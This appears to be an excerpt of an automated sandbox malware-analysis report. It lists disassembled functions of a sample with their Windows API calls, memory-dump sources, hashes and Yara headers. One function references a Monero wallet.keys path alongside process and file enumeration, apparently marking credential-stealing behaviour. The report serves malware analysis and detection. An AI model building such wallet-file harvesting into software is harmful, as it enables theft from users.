                                        • Instruction ID: fcc114a6f18173a23768d2bb9e4bafba55d25730d4c1a2b6bbd4aecb47f5c473
                                        • Opcode Fuzzy Hash: 37c9dc476b3a71dd97e2a10d13394fe7b0f4ca881a0e3207e46fa2c71b1de505
                                        • Instruction Fuzzy Hash: B8314A71A103089BDF18DFE0DD49BEDB3B8BB54701F104468F506AB285DB74AA48CF91
                                        Function 00198810 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001A05BF), ref: 0019885A
                                        • Process32First.KERNEL32(?,00000128), ref: 0019886E
                                        • Process32Next.KERNEL32(?,00000128), ref: 00198883
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • CloseHandle.KERNEL32(?), ref: 001988F1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                        • String ID:
                                        • API String ID: 1066202413-0
                                        • Opcode ID: a82da5766942629584f211b67b8c88f6798b8142ca82518a5a568f7a90097fd0
                                        • Instruction ID: 5fdbecc7c9a6d751238586d426c756dd7dced5348da97e791ae7af7f916dd824
                                        • Opcode Fuzzy Hash: a82da5766942629584f211b67b8c88f6798b8142ca82518a5a568f7a90097fd0
                                        • Instruction Fuzzy Hash: C7316871901218ABCF24EF95DD51FEEB378FF55700F5045A9F10AA62A1DB306A48CFA1
                                        Function 001FFDF7 Relevance: 6.1, APIs: 4, Instructions: 60COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 001FFE13
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001FFE2C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Value___vcrt_
                                        • String ID:
                                        • API String ID: 1426506684-0
                                        • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction ID: 4672c716d6ea528209e840b8e50c38489fba3f44a44ac07ddda887d951a26347
                                        • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                                        • Instruction Fuzzy Hash: 5A01B132119729EEF73426745CC99763A95EF017B5736433EF626801F3EF924C629540
                                        Function 00199470 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00193D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00193D3E,?), ref: 0019948C
                                        • GetFileSizeEx.KERNEL32(000000FF,00193D3E), ref: 001994A9
                                        • CloseHandle.KERNEL32(000000FF), ref: 001994B7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: 58a37fd5174ddde7ba6b9a166e52a1e89218be40349f96c5f32df6c9fe524640
                                        • Instruction ID: e11a15a691db9d2adde7d2a63badf8bbcf9f59936c0d5157707f813e84d1cf98
                                        • Opcode Fuzzy Hash: 58a37fd5174ddde7ba6b9a166e52a1e89218be40349f96c5f32df6c9fe524640
                                        • Instruction Fuzzy Hash: 8CF03C39E04308BBDB14DBB4EC49F9E77B9AB48711F108668FA51A7280D674A6018F94
                                        Function 0019CA72 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __getptd.LIBCMT ref: 0019CA7E
                                          • Part of subcall function 0019C2A0: __amsg_exit.LIBCMT ref: 0019C2B0
                                        • __getptd.LIBCMT ref: 0019CA95
                                        • __amsg_exit.LIBCMT ref: 0019CAA3
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 0019CAC7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: 47e91e82ff7b1625aba2527c8eb6695d5a53cbe841735f5f3cc263d1b5c66c89
                                        • Instruction ID: 0056b689add7b7f92120022fa9f49672e48bad24ed6e5c2c78a2cc13508046fb
                                        • Opcode Fuzzy Hash: 47e91e82ff7b1625aba2527c8eb6695d5a53cbe841735f5f3cc263d1b5c66c89
                                        • Instruction Fuzzy Hash: BCF0B4329483189BDF20FBF8A84375E33A0AF21720F510149F485A72D2EB245D808BD5
                                        Function 002004D3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Catch
                                        • String ID: MOC$RCC
                                        • API String ID: 78271584-2084237596
                                        • Opcode ID: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction ID: 7d4163ac31db5b016314554f662ed1719474f90ff1aa2d1f0fc7cadbf42add3a
                                        • Opcode Fuzzy Hash: 0af11e6eed5334c4ff19d0facd52f0310ea7249913ed55efd4c21f0934d53438
                                        • Instruction Fuzzy Hash: 50414B7190020AAFEF15DF94DC81BAE7BB5FF48304F544159F90466292D3359960DF50
                                        Function 00195190 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 001951CA
                                        • lstrcat.KERNEL32(?,001A1058), ref: 001951E7
                                        • lstrcat.KERNEL32(?,011C91D8), ref: 001951FB
                                        • lstrcat.KERNEL32(?,001A105C), ref: 0019520D
                                          • Part of subcall function 00194B60: wsprintfA.USER32 ref: 00194B7C
                                          • Part of subcall function 00194B60: FindFirstFileA.KERNEL32(?,?), ref: 00194B93
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC4), ref: 00194BC1
                                          • Part of subcall function 00194B60: StrCmpCA.SHLWAPI(?,001A0FC8), ref: 00194BD7
                                          • Part of subcall function 00194B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00194DCD
                                          • Part of subcall function 00194B60: FindClose.KERNEL32(000000FF), ref: 00194DE2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: ffca91118f15e95cbfc399b050719599fcdf8abd86542d9a75fccf716913212b
                                        • Instruction ID: 8483b4c5cc54fd85c64573845cdcee9cee95de24b8664390316d333e427ddb08
                                        • Opcode Fuzzy Hash: ffca91118f15e95cbfc399b050719599fcdf8abd86542d9a75fccf716913212b
                                        • Instruction Fuzzy Hash: 4121B67A900208A7CB54FBB0FC42EED733C9B65301F4045A8B65697192EF70AAC88B95